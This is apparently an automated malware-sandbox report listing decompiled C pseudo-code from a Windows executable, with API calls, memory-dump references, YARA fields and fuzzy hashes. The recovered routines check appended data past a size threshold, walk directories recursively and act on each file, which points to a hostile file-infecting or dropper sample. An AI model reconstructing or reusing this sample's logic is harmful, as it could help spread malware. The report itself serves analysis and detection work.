
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040137C(void* __eax, intOrPtr* __ecx, intOrPtr __edx) {
                                                                                                                          				intOrPtr _v20;
                                                                                                                          				intOrPtr _v24;
                                                                                                                          				void* _v28;
                                                                                                                          				intOrPtr* _v32;
                                                                                                                          				intOrPtr* _t24;
                                                                                                                          				intOrPtr _t27;
                                                                                                                          				intOrPtr _t31;
                                                                                                                          				int _t32;
                                                                                                                          				intOrPtr* _t35;
                                                                                                                          				intOrPtr* _t42;
                                                                                                                          				void* _t43;
                                                                                                                          				void* _t44;
                                                                                                                          				intOrPtr* _t45;
                                                                                                                          
                                                                                                                          				_t45 =  &_v20;
                                                                                                                          				_v32 = __ecx;
                                                                                                                          				 *_t45 = __edx;
                                                                                                                          				_v28 = 0xffffffff;
                                                                                                                          				_v24 = 0;
                                                                                                                          				_t44 = __eax;
                                                                                                                          				_v20 =  *_t45 + __eax;
                                                                                                                          				_t35 =  *0x40a5d4; // 0x640eb4
                                                                                                                          				while(_t35 != 0x40a5d4) {
                                                                                                                          					_t42 =  *_t35;
                                                                                                                          					_t43 =  *(_t35 + 8);
                                                                                                                          					if(_t44 <= _t43 && _t43 +  *((intOrPtr*)(_t35 + 0xc)) <= _v20) {
                                                                                                                          						if(_t43 < _v28) {
                                                                                                                          							_v28 = _t43;
                                                                                                                          						}
                                                                                                                          						_t31 = _t43 +  *((intOrPtr*)(_t35 + 0xc));
                                                                                                                          						if(_t31 > _v24) {
                                                                                                                          							_v24 = _t31;
                                                                                                                          						}
                                                                                                                          						_t32 = VirtualFree(_t43, 0, 0x8000); // executed
                                                                                                                          						if(_t32 == 0) {
                                                                                                                          							 *0x40a5b0 = 1;
                                                                                                                          						}
                                                                                                                          						E00401184(_t35);
                                                                                                                          					}
                                                                                                                          					_t35 = _t42;
                                                                                                                          				}
                                                                                                                          				_t24 = _v32;
                                                                                                                          				 *_t24 = 0;
                                                                                                                          				if(_v24 != 0) {
                                                                                                                          					 *_v32 = _v28;
                                                                                                                          					_t27 = _v24 - _v28;
                                                                                                                          					 *((intOrPtr*)(_v32 + 4)) = _t27;
                                                                                                                          					return _t27;
                                                                                                                          				}
                                                                                                                          				return _t24;
                                                                                                                          			}

















                                                                                                                          APIs
                                                                                                                          • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004013E0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1263568516-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00401434(signed int __eax, void** __ecx, intOrPtr __edx) {
                                                                                                                          				signed int _v20;
                                                                                                                          				void** _v24;
                                                                                                                          				void* _t15;
                                                                                                                          				void** _t16;
                                                                                                                          				void* _t17;
                                                                                                                          				signed int _t27;
                                                                                                                          				intOrPtr* _t29;
                                                                                                                          				void* _t31;
                                                                                                                          				intOrPtr* _t32;
                                                                                                                          
                                                                                                                          				_v24 = __ecx;
                                                                                                                          				 *_t32 = __edx;
                                                                                                                          				_t31 = __eax & 0xfffff000;
                                                                                                                          				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
                                                                                                                          				 *_v24 = _t31;
                                                                                                                          				_t15 = _v20 - _t31;
                                                                                                                          				_v24[1] = _t15;
                                                                                                                          				_t29 =  *0x40a5d4; // 0x640eb4
                                                                                                                          				while(_t29 != 0x40a5d4) {
                                                                                                                          					_t17 =  *(_t29 + 8);
                                                                                                                          					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
                                                                                                                          					if(_t31 > _t17) {
                                                                                                                          						_t17 = _t31;
                                                                                                                          					}
                                                                                                                          					if(_t27 > _v20) {
                                                                                                                          						_t27 = _v20;
                                                                                                                          					}
                                                                                                                          					if(_t27 > _t17) {
                                                                                                                          						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
                                                                                                                          						if(_t15 == 0) {
                                                                                                                          							_t16 = _v24;
                                                                                                                          							 *_t16 = 0;
                                                                                                                          							return _t16;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_t29 =  *_t29;
                                                                                                                          				}
                                                                                                                          				return _t15;
                                                                                                                          			}













                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004014A1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4275171209-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 93%
                                                                                                                          			E004014C8(void* __eax, void** __ecx, void* __edx) {
                                                                                                                          				int _t7;
                                                                                                                          				void* _t9;
                                                                                                                          				signed int _t14;
                                                                                                                          				intOrPtr* _t19;
                                                                                                                          				signed int _t22;
                                                                                                                          				void** _t23;
                                                                                                                          
                                                                                                                          				_push(__ecx);
                                                                                                                          				 *_t23 = __eax + 0x00000fff & 0xfffff000;
                                                                                                                          				_t22 = __eax + __edx & 0xfffff000;
                                                                                                                          				 *__ecx =  *_t23;
                                                                                                                          				_t7 = _t22 -  *_t23;
                                                                                                                          				__ecx[1] = _t7;
                                                                                                                          				_t19 =  *0x40a5d4; // 0x640eb4
                                                                                                                          				while(_t19 != 0x40a5d4) {
                                                                                                                          					_t9 =  *(_t19 + 8);
                                                                                                                          					_t14 =  *((intOrPtr*)(_t19 + 0xc)) + _t9;
                                                                                                                          					if(_t9 <  *_t23) {
                                                                                                                          						_t9 =  *_t23;
                                                                                                                          					}
                                                                                                                          					if(_t22 < _t14) {
                                                                                                                          						_t14 = _t22;
                                                                                                                          					}
                                                                                                                          					if(_t14 > _t9) {
                                                                                                                          						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
                                                                                                                          						if(_t7 == 0) {
                                                                                                                          							 *0x40a5b0 = 2;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_t19 =  *_t19;
                                                                                                                          				}
                                                                                                                          				return _t7;
                                                                                                                          			}










                                                                                                                          APIs
                                                                                                                          • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00000000,00004003,0040172F), ref: 00401522
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1263568516-0
                                                                                                                          • Opcode ID: 366ed2c7ca182d6b4595971b05bf8940527af6e3e06c25c2a4c3263d2ce5472b
                                                                                                                          • Instruction ID: c2f9954cc8299db513f2c37eb2bc070e0fd4fafed15322d1c8bcd52f3136bf23
                                                                                                                          • Opcode Fuzzy Hash: 366ed2c7ca182d6b4595971b05bf8940527af6e3e06c25c2a4c3263d2ce5472b
                                                                                                                          • Instruction Fuzzy Hash: E501F7736043006FC3109E28DDC092A77A4EBC5324F15053EDA85AB3A1D73AAC0587A8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 31%
                                                                                                                          			E004070DC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                          				char _v8;
                                                                                                                          				intOrPtr _t19;
                                                                                                                          				intOrPtr _t24;
                                                                                                                          
                                                                                                                          				_push(0);
                                                                                                                          				_push(_t24);
                                                                                                                          				_push(0x407126);
                                                                                                                          				_push( *[fs:eax]);
                                                                                                                          				 *[fs:eax] = _t24;
                                                                                                                          				E004049D0(0, __ebx,  &_v8, __edi, __esi); // executed
                                                                                                                          				E00404C78(E0040340C(_v8), __ebx, 0xa200, 0x40a698, __edi, __esi); // executed
                                                                                                                          				_pop(_t19);
                                                                                                                          				 *[fs:eax] = _t19;
                                                                                                                          				_push(E0040712D);
                                                                                                                          				return E00403094( &_v8);
                                                                                                                          			}







                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileModuleName
                                                                                                                          • String ID: MZP
                                                                                                                          • API String ID: 514040917-2889622443
                                                                                                                          • Opcode ID: 2f22c95ce754a069faf3e5d71a99af3f29d8e87556c895829c3b73c460f21ff1
                                                                                                                          • Instruction ID: dbacf8f9bda0d2f3624fed2e55e69454661720eb62c3ca271fb24a4619442e3b
                                                                                                                          • Opcode Fuzzy Hash: 2f22c95ce754a069faf3e5d71a99af3f29d8e87556c895829c3b73c460f21ff1
                                                                                                                          • Instruction Fuzzy Hash: 32E09270708304AFE701EB72DC13A19B7ACD78A704FA24877E600AA6D1DA7DAE118519
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404B90(void* __eax) {
                                                                                                                          				signed int _t4;
                                                                                                                          
                                                                                                                          				_t4 = CloseHandle(__eax); // executed
                                                                                                                          				return _t4 & 0xffffff00 | _t4 != 0x00000000;
                                                                                                                          			}





                                                                                                                          APIs
                                                                                                                          • CloseHandle.KERNEL32(00000000,00404CD0,00000000,00404CE6), ref: 00404B91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2962429428-0
                                                                                                                          • Opcode ID: ef71f196dd3e8bd5321f6bf3e93503307ae4868d30203b0da39ae7c2a7e1010a
                                                                                                                          • Instruction ID: f540dd3953723152695a7cfd94b4b723d26dbf970bde7b3718d3bc06e0259ed2
                                                                                                                          • Opcode Fuzzy Hash: ef71f196dd3e8bd5321f6bf3e93503307ae4868d30203b0da39ae7c2a7e1010a
                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 52%
                                                                                                                          			E00407678(void* __ebx, void* __edi, void* __esi) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				char _v16;
                                                                                                                          				char _v40254;
                                                                                                                          				char _v41488;
                                                                                                                          				char _v41492;
                                                                                                                          				char _v41496;
                                                                                                                          				intOrPtr _v41500;
                                                                                                                          				char _v41504;
                                                                                                                          				char _v41508;
                                                                                                                          				char _v41512;
                                                                                                                          				char _v41516;
                                                                                                                          				intOrPtr _v41520;
                                                                                                                          				char _v41524;
                                                                                                                          				char _v41528;
                                                                                                                          				char _v41532;
                                                                                                                          				char _v41536;
                                                                                                                          				void* _t49;
                                                                                                                          				void* _t101;
                                                                                                                          				intOrPtr _t133;
                                                                                                                          				intOrPtr _t137;
                                                                                                                          				intOrPtr _t138;
                                                                                                                          
                                                                                                                          				_t100 = __ebx;
                                                                                                                          				_t137 = _t138;
                                                                                                                          				_t101 = 0x144b;
                                                                                                                          				do {
                                                                                                                          					_push(0);
                                                                                                                          					_push(0);
                                                                                                                          					_t101 = _t101 - 1;
                                                                                                                          					_t139 = _t101;
                                                                                                                          				} while (_t101 != 0);
                                                                                                                          				_push(_t101);
                                                                                                                          				_push(_t137);
                                                                                                                          				_push(0x40798c);
                                                                                                                          				_push( *[fs:eax]);
                                                                                                                          				 *[fs:eax] = _t138;
                                                                                                                          				E00405008( &_v41492, __ebx, _t101);
                                                                                                                          				_push( &_v41492);
                                                                                                                          				E004031F4( &_v41496, 9, 0x4091b4);
                                                                                                                          				_pop(_t49);
                                                                                                                          				E00403214(_t49, _v41496);
                                                                                                                          				E00404DE0(_v41492, __ebx); // executed
                                                                                                                          				E00405008( &_v41504, __ebx, 9);
                                                                                                                          				_push(_v41504);
                                                                                                                          				E004031F4( &_v41508, 9, 0x4091b4);
                                                                                                                          				_push(_v41508);
                                                                                                                          				E004031F4( &_v41512, 3, 0x4091dc);
                                                                                                                          				_push(_v41512);
                                                                                                                          				E004032CC();
                                                                                                                          				E00405200(_v41500, __ebx, __esi, _t139); // executed
                                                                                                                          				E004049D0(0, _t100,  &_v41516, __edi, __esi);
                                                                                                                          				_v8 = E00405B60(_v41516,  &_v41516);
                                                                                                                          				_push(_t137);
                                                                                                                          				_push(0x40789f);
                                                                                                                          				_push( *[fs:eax]);
                                                                                                                          				 *[fs:eax] = _t138;
                                                                                                                          				E00405008( &_v41524, _t100, 3);
                                                                                                                          				_push(_v41524);
                                                                                                                          				E004031F4( &_v41528, 9, 0x4091b4);
                                                                                                                          				_push(_v41528);
                                                                                                                          				E004049D0(0, _t100,  &_v41536, __edi, __esi);
                                                                                                                          				E00404ED0(_v41536,  &_v41532);
                                                                                                                          				_push(_v41532);
                                                                                                                          				E004032CC();
                                                                                                                          				_v12 = E00405B24(_v41520, 0x40000103);
                                                                                                                          				_push(_t137);
                                                                                                                          				_push(0x407882);
                                                                                                                          				_push( *[fs:eax]);
                                                                                                                          				 *[fs:eax] = _t138;
                                                                                                                          				E0040597C(_v8);
                                                                                                                          				E00405974();
                                                                                                                          				E00405988(_v8);
                                                                                                                          				E0040254C( &_v40254, 4,  &_v16);
                                                                                                                          				E00407080( &_v41488, _v16, 0x3e8);
                                                                                                                          				E0040598C(_v12);
                                                                                                                          				E00405974();
                                                                                                                          				E00405BE8(_v12, E0040597C(_v8) - 0x14400, _v8);
                                                                                                                          				_pop(_t133);
                                                                                                                          				 *[fs:eax] = _t133;
                                                                                                                          				_push(E00407889);
                                                                                                                          				return E00404520(_v12);
                                                                                                                          			}

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e2ffbce9ad41ee186f7f6225872613ed6a0bd1f14c14150b1f77e3a925856f57
                                                                                                                          • Instruction ID: bad4d56910de55197467fd61e6ec6c56c875cf63360af75c5594bc2395637eb8
                                                                                                                          • Opcode Fuzzy Hash: e2ffbce9ad41ee186f7f6225872613ed6a0bd1f14c14150b1f77e3a925856f57
                                                                                                                          • Instruction Fuzzy Hash: 42514170B002199BDF10EB69CC51A9DB7B5EB46308F1084FAA404772D1DA3DAF458E5A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 82%
                                                                                                                          			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                                                                          				void* _v24;
                                                                                                                          				char _v28;
                                                                                                                          				void* _v32;
                                                                                                                          				char _v36;
                                                                                                                          				intOrPtr _t26;
                                                                                                                          				void* _t36;
                                                                                                                          				void* _t47;
                                                                                                                          				void* _t48;
                                                                                                                          				intOrPtr _t71;
                                                                                                                          				void* _t79;
                                                                                                                          				void* _t81;
                                                                                                                          				void* _t86;
                                                                                                                          
                                                                                                                          				_t86 = __fp0;
                                                                                                                          				_t81 = __eflags;
                                                                                                                          				_t76 = __esi;
                                                                                                                          				_t75 = __edi;
                                                                                                                          				_t54 = __ebx;
                                                                                                                          				_v36 = 0;
                                                                                                                          				_v28 = 0;
                                                                                                                          				_v32 = 0;
                                                                                                                          				_v24 = 0;
                                                                                                                          				E00403F14(0x408054);
                                                                                                                          				_push(_t79);
                                                                                                                          				_push(0x408220);
                                                                                                                          				_push( *[fs:eax]);
                                                                                                                          				 *[fs:eax] = _t79 + 0xffffffe0;
                                                                                                                          				E00407080(0x4091a8, 0xb, 0xb);
                                                                                                                          				E00407080(0x4091b4, 9, 9);
                                                                                                                          				E00407080(0x4091c0, 3, 3);
                                                                                                                          				E00407080(0x4091dc, 3, 3);
                                                                                                                          				_t26 =  *0x409210; // 0x40919c
                                                                                                                          				E00407080(_t26, 0xb, 0xb); // executed
                                                                                                                          				E004070DC(__ebx, __edi, __esi, _t81); // executed
                                                                                                                          				E004049D0(0, __ebx,  &_v24, __edi, __esi);
                                                                                                                          				if(E00404F6C(_v24) > 0xa200) {
                                                                                                                          					E00407678(_t54, _t75, _t76); // executed
                                                                                                                          				}
                                                                                                                          				E00407E90(_t54, _t75, _t76); // executed
                                                                                                                          				_t60 = 3;
                                                                                                                          				_t70 = 3;
                                                                                                                          				E00407080(0x4091c4, 3, 3);
                                                                                                                          				_t36 = E00404AE8(_t54, _t75, _t76);
                                                                                                                          				_t83 = _t36;
                                                                                                                          				if(_t36 != 0) {
                                                                                                                          					E004049D0(0, _t54,  &_v28, _t75, _t76);
                                                                                                                          					_push(_v28);
                                                                                                                          					_t60 = 3;
                                                                                                                          					E004031F4( &_v32, 3, 0x4091c4);
                                                                                                                          					_t70 = _v32;
                                                                                                                          					_pop(_t47);
                                                                                                                          					_t48 = E00406FE4(_t47, _t54, _v32, _t83);
                                                                                                                          					_t84 = _t48;
                                                                                                                          					if(_t48 != 0) {
                                                                                                                          						_t70 =  &_v36;
                                                                                                                          						E004049D0(1, _t54,  &_v36, _t75, _t76);
                                                                                                                          						E00407D9C(_v36, _t54,  &_v36, _t75, _t76); // executed
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				E004079A0(_t54, _t75, _t76, _t84); // executed
                                                                                                                          				E0040759C(_t54, _t60, _t70, _t75, _t76, _t84, _t86); // executed
                                                                                                                          				_pop(_t71);
                                                                                                                          				 *[fs:eax] = _t71;
                                                                                                                          				_push(0x408227);
                                                                                                                          				return E004030B8( &_v36, 4);
                                                                                                                          			}

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFindModule$CloseFirstHandleName
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2572062711-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 60%
                                                                                                                          			E004074B4(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				char _v12;
                                                                                                                          				char _v16;
                                                                                                                          				char _v20;
                                                                                                                          				char _v24;
                                                                                                                          				char _v28;
                                                                                                                          				void* _t34;
                                                                                                                          				intOrPtr _t62;
                                                                                                                          				void* _t71;
                                                                                                                          				void* _t72;
                                                                                                                          				void* _t74;
                                                                                                                          				intOrPtr _t77;
                                                                                                                          
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_v8 = __eax;
                                                                                                                          				E004033FC(_v8);
                                                                                                                          				_push(_t77);
                                                                                                                          				_push(0x40758b);
                                                                                                                          				_push( *[fs:eax]);
                                                                                                                          				 *[fs:eax] = _t77;
                                                                                                                          				E004031F4( &_v12, 3, 0x4091dc);
                                                                                                                          				_t49 = E004052AC(_v8, 0, _v12);
                                                                                                                          				_t71 = E0040532C(_t25) - 1;
                                                                                                                          				if(_t71 >= 0) {
                                                                                                                          					_t72 = _t71 + 1;
                                                                                                                          					_t74 = 0;
                                                                                                                          					do {
                                                                                                                          						_t34 = E0040534C(_t49, _t74);
                                                                                                                          						_t81 = _t34;
                                                                                                                          						if(_t34 == 0) {
                                                                                                                          							E00405338(_t49,  &_v28, _t74);
                                                                                                                          							E00403258( &_v24, _v28,  *((intOrPtr*)(_t49 + 0x1c)));
                                                                                                                          							E004071D0(_v24, _t49, _t72, _t74); // executed
                                                                                                                          						} else {
                                                                                                                          							E00405338(_t49,  &_v20, _t74);
                                                                                                                          							E00403258( &_v16, _v20,  *((intOrPtr*)(_t49 + 0x1c)));
                                                                                                                          							E004074B4(_v16, _t49, _t72, _t74, _t81, _a4); // executed
                                                                                                                          						}
                                                                                                                          						_t74 = _t74 + 1;
                                                                                                                          						_t72 = _t72 - 1;
                                                                                                                          					} while (_t72 != 0);
                                                                                                                          				}
                                                                                                                          				E00404520(_t49);
                                                                                                                          				_pop(_t62);
                                                                                                                          				 *[fs:eax] = _t62;
                                                                                                                          				_push(E00407592);
                                                                                                                          				return E004030B8( &_v28, 6);
                                                                                                                          			}
















                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 56%
                                                                                                                          			E00404DE0(char __eax, signed int __ebx) {
                                                                                                                          				void* _v8;
                                                                                                                          				char _v12;
                                                                                                                          				void* _v16;
                                                                                                                          				char _v20;
                                                                                                                          				void* _t45;
                                                                                                                          				intOrPtr _t55;
                                                                                                                          				intOrPtr _t64;
                                                                                                                          				void* _t65;
                                                                                                                          				void* _t68;
                                                                                                                          
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(__ebx);
                                                                                                                          				_v8 = __eax;
                                                                                                                          				E004033FC(_v8);
                                                                                                                          				_push(_t64);
                                                                                                                          				_push(0x404e9f);
                                                                                                                          				_push( *[fs:eax]);
                                                                                                                          				 *[fs:eax] = _t64;
                                                                                                                          				_t65 = E0040320C(_v8);
                                                                                                                          				_t49 = __ebx & 0xffffff00 | _t65 > 0x00000000;
                                                                                                                          				if((__ebx & 0xffffff00 | _t65 > 0x00000000) != 0) {
                                                                                                                          					E00404DCC(_v8,  &_v12);
                                                                                                                          					E0040312C( &_v8, _v12);
                                                                                                                          					if(E0040320C(_v8) >= 3) {
                                                                                                                          						_t68 = E00404CF8(_v8);
                                                                                                                          						if(_t68 == 0) {
                                                                                                                          							E00404EEC( &_v16);
                                                                                                                          							E00403358(_v16, _v8);
                                                                                                                          							if(_t68 != 0) {
                                                                                                                          								E00404EEC( &_v20);
                                                                                                                          								_t45 = E00404DE0(_v20, _t49); // executed
                                                                                                                          								if(_t45 == 0 || E00404EB0(_v8) == 0) {
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_pop(_t55);
                                                                                                                          				 *[fs:eax] = _t55;
                                                                                                                          				_push(E00404EA6);
                                                                                                                          				return E004030B8( &_v20, 4);
                                                                                                                          			}













                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E00406E94(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                                                                          				char _v12;
                                                                                                                          				char _v16;
                                                                                                                          				char _v20;
                                                                                                                          				intOrPtr* _t20;
                                                                                                                          				void* _t24;
                                                                                                                          				intOrPtr _t40;
                                                                                                                          				void* _t46;
                                                                                                                          
                                                                                                                          				_push(__ebx);
                                                                                                                          				_v16 = 0;
                                                                                                                          				_v20 = 0;
                                                                                                                          				_push(_t46);
                                                                                                                          				_push(0x406f22);
                                                                                                                          				_push( *[fs:eax]);
                                                                                                                          				 *[fs:eax] = _t46 + 0xfffffff0;
                                                                                                                          				E00405008( &_v16, 1, __ecx);
                                                                                                                          				_push( &_v16);
                                                                                                                          				E004031F4( &_v20, 0xb, 0x40919c);
                                                                                                                          				_pop(_t20);
                                                                                                                          				E00403214(_t20, _v20);
                                                                                                                          				_t24 = E00404C78(E0040340C(_v16), 1, 8,  &_v12, __edi, __esi); // executed
                                                                                                                          				if(_t24 != 0) {
                                                                                                                          					E004057D8(__fp0);
                                                                                                                          					asm("fcomp dword [0x406f30]");
                                                                                                                          					asm("fnstsw ax");
                                                                                                                          					asm("sahf");
                                                                                                                          				}
                                                                                                                          				_pop(_t40);
                                                                                                                          				 *[fs:eax] = _t40;
                                                                                                                          				_push(E00406F29);
                                                                                                                          				return E004030B8( &_v20, 2);
                                                                                                                          			}











                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LocalPathTempTime
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2118298429-0
                                                                                                                          • Opcode ID: be31c71bef31dcf0d495f0e1e2d88fef08ea193925f7f09ef08642d0a6e869a3
                                                                                                                          • Instruction ID: 68f96da1d51e9565b10b5108b435a8bc67f0bfec9723d228dfcbae9d3fbb17ab
                                                                                                                          • Opcode Fuzzy Hash: be31c71bef31dcf0d495f0e1e2d88fef08ea193925f7f09ef08642d0a6e869a3
                                                                                                                          • Instruction Fuzzy Hash: 4A0175709042099FDB00EFA5DC5159FB7BDFB45300F52857BE414F36C5DB38AA148A69
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004052AC(void* __eax, void* __ecx, void* __edx) {
                                                                                                                          				void* __esi;
                                                                                                                          				void* _t7;
                                                                                                                          				intOrPtr _t11;
                                                                                                                          				void* _t14;
                                                                                                                          
                                                                                                                          				_t14 = __eax;
                                                                                                                          				_t11 =  *0x40447c; // 0x404488
                                                                                                                          				_t7 = E004044F8(_t11, 0);
                                                                                                                          				E00405634(_t7, __edx, _t14, _t14, 0, __ecx); // executed
                                                                                                                          				return _t7;
                                                                                                                          			}








                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
